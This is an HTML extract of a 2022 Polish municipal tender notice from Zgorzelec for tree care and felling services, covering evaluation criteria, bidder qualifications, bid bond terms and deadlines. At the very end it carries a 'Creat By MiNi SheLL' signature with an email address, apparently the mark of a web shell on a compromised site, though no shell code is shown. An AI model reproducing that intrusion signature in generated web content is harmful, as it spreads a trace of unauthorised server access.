dyplom potwierdzający kwalifikacje zawodowe w <br/>zawodach związanych z pielęgnacją zieleni, lub przez co <br/>najmniej 9 miesięcy brała udział w tego rodzaju pracach <br/>prowadzonych przy zabytkach wpisanych do rejestru lub była <br/>zatrudniona przy tych pracach w muzeum będącym instytucją <br/>kultury zgodnie z art. 37b ust.3 ustawy z dnia 23 lipca 2003r. o <br/>ochronie zabytków i opiece nad zabytkami.<br/>- Zamawiający dopuszcza łączenie funkcji wskazanych w pkt <br/>3 i 4 niniejszego punktu pod warunkiem łącznego <br/>spełnienia przypisanych im warunków. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">77211500-7 - Usługi pielęgnacji drzew</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72312100-6 - Usługi przygotowywania danych</p> <p class="mb-0">77211400-6 - Usługi wycinania drzew</p> <p class="mb-0">77211600-8 - Sadzenie drzew</p> <p class="mb-0">77340000-5 - Usługi okrzesywania drzew oraz przycinania żywopłotów</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wykonawca określi szacunkową łączną wartość brutto oferty w PLN <br/>w formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ, <br/>zgodnie z zapisami niniejszego Rozdziału SWZ.<br/>W kwocie wynagrodzenia brutto uwzględnia się podatek od towarów <br/>i usług.2. Podstawą do ustalenia ceny oferty jest szczegółowy opis <br/>przedmiotu zamówienia, o którym mowa w rozdziale IV SWZ oraz <br/>warunki i obowiązki określone w projekcie umowy, stanowiącym <br/>załącznik nr 5 do SWZ.3. Wykonawca w formularzu cenowym – załącznik nr 1A do SWZ, określi ceny jednostkowe brutto dla wszystkich wymienionych w <br/>formularzu usług. Ceny jednostkowe brutto stanowić będą podstawę <br/>do rozliczeń między Wykonawcą a Zamawiającym podczas realizacji <br/>umowy, zgodnie z zasadami określonymi w projekcie umowy <br/>stanowiącym załącznik nr 5 do SWZ.4. W cenie jednostkowej brutto oferty Wykonawca powinien uwzględnić wszystkie elementy cenotwórcze niezbędne do prawidłowej realizacji zamówienia. Ceny jednostkowe będą niezmienne przez cały okres realizacji umowy. W cenie jednostkowej brutto <br/>uwzględnia się podatek od towarów i usług. 5. W celu porównania złożonych ofert Zamawiający będzie brał pod uwagę szacunkową wartość oferty brutto podaną w formularzu ofertowym stanowiącym załącznik nr 1 do SWZ.<br/>Szacunkowa wartość brutto oferty stanowić będzie iloczyn <br/>szacunkowej ilości usług do wykonania w okresie obowiązywania <br/>umowy, określonych w formularzu cenowym, stanowiącym załącznik<br/>Nr 1A do SWZ oraz cen jednostkowych brutto w nim określonych. <br/>W kwocie wynagrodzenia brutto uwzględnia się podatek od towarów <br/>i usług.6. Szacunkowa łączna wartość za wykonanie przedmiotu zamówienia <br/>określona w formularzu ofertowym – załącznik nr 1 do SWZ, musi <br/>być tożsama z szacunkową wartością wynikającą z formularza cenowego- załącznik nr 1A do SWZ.7. Wynagrodzenie Wykonawcy będzie naliczane za faktyczną ilość wykonanych usług, zgodnie z zapisami projektu umowy stanowiącego załącznik nr 5 do SWZ. Wynagrodzenie będzie <br/>zależne od ilości faktycznie wykonanych usług, zgodnych z treścią zlecenia. 8. Zamawiający zastrzega sobie możliwość zwiększenia lub zmniejszenia ilości wykonanych usług, wymienionych w formularzu cenowym, przy czym wartość wykonanych usług nie może przekroczyć szacunkowej łącznej wartości brutto określonej w formularzu ofertowym – załącznik nr 1 do SWZ. <br/>9. Szacunkowa wartość brutto oferty służyć będzie Zamawiającemu <br/>wyłącznie do dokonania wyboru najkorzystniejszej oferty poprzez <br/>przyznanie punktów w kryterium „cena”.10. Pominięcie pozycji z formularza cenowego, zmiana opisów przedmiotu usług, nie podanie ceny jednostkowej brutto, dodanie innej pozycji, spowoduje odrzucenie oferty, z powodu niezgodności z treścią Specyfikacji Warunków Zamówienia.11. Jeżeli została złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2021 r. poz. 685, ze zm.), dla celów zastosowania kryterium ceny lub kosztu Zamawiający dolicza do przedstawionej w tej <br/>ofercie ceny kwotę podatku od towarów i usług, którą miałby <br/>obowiązek rozliczyć. W formularzu ofertowym, o którym mowa w ust. 1 niniejszego Rozdziału SWZ, zgodnie z art. 225 ust. 2 ustawy <br/>Pzp, Wykonawca ma obowiązek:1) Poinformowania zamawiającego, że wybór jego oferty będzie prowadził do powstania u Zamawiającego obowiązku <br/>podatkowego;2) Wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku <br/>podatkowego;3) Wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym Zamawiającego, bez kwoty podatku;<br/>4) Wskazania stawki podatku od towarów i usług, która zgodnie<br/>z wiedzą Wykonawcy, będzie miała zastosowanie.<br/>12. Walutą rozliczeniową obowiązującą w niniejszym zamówieniu <br/>publicznym jest złoty polski zgodnie z ustawą z dnia 29.08.1997 r. o <br/>Narodowym Banku Polskim, oznaczany w Specyfikacji jako „złoty”, <br/>„PLN” lub „zł”.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie <br/>podlegają wykluczeniu na zasadach określonych w Rozdziale IX <br/>SWZ, oraz spełniają określone przez Zamawiającego warunki<br/>udziału w postępowaniu.<br/>2. Zgodnie z art. 112 ust. 1 ustawy Pzp, Zamawiający określa warunki<br/>udziału w postępowaniu dotyczące zdolności technicznej lub <br/>zawodowej.<br/>Wymagane doświadczenie zawodowe Wykonawcy:<br/>o udzielenie zamówienia może ubiegać się Wykonawca, który <br/>wykaże, że nie wcześniej niż w okresie ostatnich trzech lat przed <br/>upływem terminu składania ofert, a jeżeli okres prowadzenia <br/>działalności jest krótszy – w tym okresie, należycie wykonał lub <br/>wykonuje jedną usługę - w ramach jednej umowy - <br/>polegającą na wycince i/lub przycince drzew o wartości <br/>minimum 125.000,00 zł brutto oraz potwierdzi, że wskazana <br/>usługa została wykonana lub jest wykonywana należycie. <br/>W przypadku świadczeń powtarzających się lub ciągłych nadal <br/>wykonywanych referencje bądź inne dokumenty potwierdzające ich <br/>należyte wykonywanie powinny być wystawione w okresie ostatnich <br/>3 miesięcy.<br/>W przypadku usługi nadal wykonywanej wartość wykonanej usługi<br/>przed upływem terminu składania ofert nie może być mniejsza niż <br/>125.000,00 zł brutto.<br/>W odniesieniu do usługi nadal wykonywanej (umowa została <br/>zawarta na okres przekraczający termin składania ofert wyznaczony <br/>przez Zamawiającego), Wykonawca zobowiązany jest podać wartość <br/>faktycznie zrealizowanej usługi od dnia zawarcia umowy do dnia <br/>składania ofert.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia, jak i w przypadku pozostałych Wykonawców warunek, <br/>o którym mowa powyżej, musi być spełniony samodzielnie przez <br/>jeden podmiot (jeden lub każdy z podmiotów musi indywidualnie <br/>posiadać wymagane doświadczenie, o którym mowa powyżej). <br/>W przypadku, gdy usługa obejmuje szerszy zakres prac, niż <br/>związany z wycinką i/lub przycinką drzew, wymaga się od <br/>Wykonawcy jednoznacznego określenia w wykazie usług wartości <br/>związanej z wycinką i/lub przycinką drzew. Wzór wykazu stanowi <br/>Załącznik Nr 4 do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć:<br/>1) Aktualne na dzień składania ofert oświadczenie z art. 125 ust. 1 <br/>ustawy Pzp o niepodleganiu wykluczeniu, składane zgodnie z art. <br/>273 ust. 2 ustawy Pzp. Informacje zawarte w przedmiotowym <br/>oświadczeniu stanowią wstępne potwierdzenie, że Wykonawca nie <br/>podlega wykluczeniu z postępowania. Wzór oświadczenia stanowi <br/>Załącznik nr 2 do SWZ;<br/>2) Aktualne na dzień składania ofert oświadczenie z art. 125 ust. 1 <br/>ustawy Pzp o spełnianiu warunków udziału w postępowaniu, <br/>składane zgodnie z art. 273 ust. 2 ustawy Pzp. Informacje zawarte <br/>w przedmiotowym oświadczeniu stanowią wstępne potwierdzenie, <br/>że Wykonawca spełnia warunki udziału w postępowaniu. Wzór <br/>oświadczenia stanowi Załącznik nr 2A do SWZ.<br/>2. Zamawiający, zgodnie z art. 274 ust. 1 ustawy Pzp, wezwie <br/>Wykonawcę, którego oferta została najwyżej oceniona , do <br/>złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia <br/>wezwania, podmiotowych środków dowodowych, na potwierdzenie <br/>spełnienia warunków udziału w postępowaniu, aktualnych n a dzień <br/>ich złożenia, tj.:<br/>Wykazu usług wykonanych nie wcześniej niż w okresie ostatnich 3<br/>lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym <br/>okresie, wraz z podaniem rodzaju usługi, jej wartości, daty i <br/>miejsca wykonania/wykonywania oraz podmiotów, na rzecz których <br/>usługa ta została wykonana lub jest wykonywana, oraz <br/>załączeniem dowodów określających, czy ta usługa została <br/>wykonana lub jest wykonywana należycie, przy czym dowodami, o <br/>których mowa, są referencje bądź inne dokumenty sporządzone <br/>przez podmiot, na rzecz którego usługa została wykonana lub jest <br/>wykonywana, a jeżeli wykonawca z przyczyn niezależnych od <br/>niego nie jest w stanie uzyskać tych dokumentów - inne <br/>odpowiednie dokumenty – wzór wykazu stanowi Załącznik nr 4 do <br/>SWZ;<br/>3. Pozostałe dokumenty wymagane przez Zamawiającego, składane <br/>wraz z ofertą:<br/>Wypełniony Formularz ofertowy, stanowiący Załącznik Nr 1 do SWZ</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do zabezpieczenia swojej oferty <br/>wadium w wysokości: 3.159,00 (słownie: trzy tysiące sto <br/>pięćdziesiąt dziewięć złotych 00/100);<br/>2. Wadium wnosi się przed upływem terminu składania ofert <br/>i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, <br/>z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 <br/>oraz ust. 2 ustawy Pzp.3. Wadium może być wnoszone w jednej lub kilku następujących formach:1) pieniądzu; 2) gwarancjach bankowych;3) gwarancjach ubezpieczeniowych;4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. <br/>U. z 2020 r. poz. 299).4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy numer: 75 1240 3464 1111 0010 6448 8461, z dopiskiem: „Wadium do postępowania nr WZP.271.1.2.2022”.<br/>UWAGA: Za termin wniesienia wadium w formie pieniężnej zostanie <br/>przyjęty termin (data oraz godzina) uznania (zaksięgowania) kwoty <br/>wadium na rachunku bankowym Zamawiającego. W związku <br/>z powyższym wadium powinno wpłynąć na rachunek bankowy <br/>Zamawiającego do upływu terminu wyznaczonego na składanie <br/>ofert, tj. przed upływem godziny i dnia wyznaczonego, jako <br/>ostateczny termin składania ofert.5. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej, zgodnie z zapisami ust. 10 niniejszego Rozdziału<br/>i zawierać w swej treści co najmniej poniżej wskazane wymagania:<br/>1) musi obejmować odpowiedzialność za wszystkie przypadki <br/>powodujące utratę wadium przez Wykonawcę określone w art. <br/>98 ust. 6 ustawy Pzp,2) z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium,3) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie Zamawiającego, bez jakichkolwiek dodatkowych zastrzeżeń i warunków,<br/>4) termin obowiązywania poręczenia lub gwarancji nie może być <br/>krótszy niż termin związania ofertą, 5) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania, <br/>6) beneficjentem poręczenia lub gwarancji jest: Gmina Miejska <br/>Zgorzelec7) w przypadku Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia (art. 58 ustawy Pzp), Zamawiający <br/>wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia (konsorcjum).6. Oferta Wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzpzostanie odrzucona na podstawie art. 226 ust. 1 pkt 14 ustawy <br/>Pzp. 7. Wadium wniesione w pieniądzu, Zamawiający zwróci wraz z <br/>odsetkami wynikającymi z umowy rachunku bankowego, na którym <br/>było ono przechowywane, pomniejszone o koszty prowadzenia <br/>rachunku bankowego oraz prowizji bankowej za przelew pieniędzy <br/>na rachunek bankowy wskazany przez Wykonawcę, na podstawie <br/>art. 98 ust. 4 ustawy Pzp.8. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art.98 ustawy Pzp.9. Wadium wniesione w formie gwarancji lub poręczenia zostanie zwrócone przez Zamawiającego poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium.<br/>10. Wadium w formie gwarancji (bankowej, ubezpieczeniowej) lub <br/>poręczeń nie musi zostać opatrzone podpisem gwaranta o ile jest sporządzone w oryginale (nie skan!) w postaci elektronicznej (jako <br/>plik, najczęściej format .pdf).Zamawiający dopuści dokument gwarancji przygotowany w formie skanu tylko, jeżeli zostanie opatrzony kwalifikowanym podpisem elektronicznym przez gwaranta. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>W takim przypadku Wykonawcy ustanawiają pełnomocnika do <br/>reprezentowania ich w postępowaniu albo do reprezentowania <br/>i zawarcia umowy w sprawie zamówienia publicznego, zgodnie <br/>z zapisami Rozdziału XIV SWZ.<br/>2. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji <br/>zawodowych lub doświadczenia, zgodnie z art. 117 ust. 3 ustawy <br/>Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia <br/>mogą polegać na zdolnościach tych z Wykonawców, którzy <br/>wykonają usługi, do realizacji których te zdolności są wymagane. <br/>W takim przypadku Wykonawcy zobowiązani są dołączyć do oferty <br/>oświadczenie, stanowiące Załącznik Nr 3 SWZ<br/>3. Oświadczenia potwierdzające brak podstaw wykluczenia oraz <br/>spełnianie warunków udziału w postępowaniu składa każdy <br/>z Wykonawców wspólnie ubiegających się o zamówienie – Załącznik <br/>Nr 2 i 2A do SWZ.<br/>4. Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających <br/>się o udzielenie zamówienia, Zamawiający będzie żądał przed <br/>zawarciem umowy w sprawie zamówienia publicznego kopii umowy <br/>regulującej współpracę tych Wykonawców, o ile umowa taka nie <br/>zostanie załączona do oferty. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmiany umowy określa § 10 projektu umowy tj. załącznika nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-03-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/zgorzelec</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-03-08 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com